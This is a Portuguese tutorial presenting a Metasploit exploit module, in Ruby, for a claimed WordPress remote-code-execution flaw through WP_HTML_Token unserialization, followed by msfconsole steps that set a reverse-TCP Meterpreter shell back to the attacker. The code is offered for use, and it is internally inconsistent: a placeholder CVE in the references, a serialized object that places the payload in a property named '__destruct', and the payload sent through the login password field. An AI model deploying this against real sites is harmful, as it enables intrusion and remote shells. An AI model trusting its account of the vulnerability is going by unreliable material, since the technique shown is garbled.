
Módulo do Metasploit que explora a desserialização do WP_HTML_Token do WordPress RCE (CVE-2024-31211) com payload personalizado para execução arbitrária de código.
Para criar um módulo Metasploit que explora a vulnerabilidade de RCE no WordPress através da desserialização de instâncias da classe WP_HTML_Token, vamos focar na criação de um payload que aciona a falha de desserialização, levando à execução arbitrária de código.
Salve o seguinte código como wordpress_wp_html_token_rce.rb no diretório modules/exploits/multi/http da sua instalação do Metasploit Framework.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WP_HTML_Token Unserialization RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability in WordPress via
the unserialization of instances of the `WP_HTML_Token` class. This allows for
code execution via its `__destruct()` magic method.
},
'Author' =>
[
'Your Name' # OneArch
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-XXXX'], # Replace with the correct CVE number
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress <= 5.x', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
}
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
})
if res && res.code == 200 && res.body.include?('wp-login.php')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending payload to trigger unserialization vulnerability")
serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'
post_data = {
'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
'user_pass' => serialized_payload,
'wp-submit' => 'Log In',
'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
'testcookie' => 1
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
'vars_post' => post_data
})
handler
end
end
Salve o Módulo:
Salve o módulo como wordpress_wp_html_token_rce.rb no diretório modules/exploits/multi/http da sua instalação do Metasploit Framework.
/path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
Carregue o Metasploit: Inicie o Metasploit Framework abrindo um terminal e executando:
msfconsole
Use o Novo Módulo: No console do Metasploit, carregue o novo módulo de exploit usando o seguinte comando:
use exploit/multi/http/wordpress_wp_html_token_rce
Configure e Execute:
Defina as opções necessárias, como RHOSTS, RPORT, TARGETURI e PAYLOAD. Em seguida, execute o módulo.
msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
LHOST => your_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
Este módulo Metasploit envia um payload serializado personalizado para uma instância vulnerável do WordPress, tentando acionar a vulnerabilidade de desserialização e alcançar a execução arbitrária de código. Ajuste o payload e o módulo conforme necessário com base na natureza específica da vulnerabilidade e no ambiente alvo.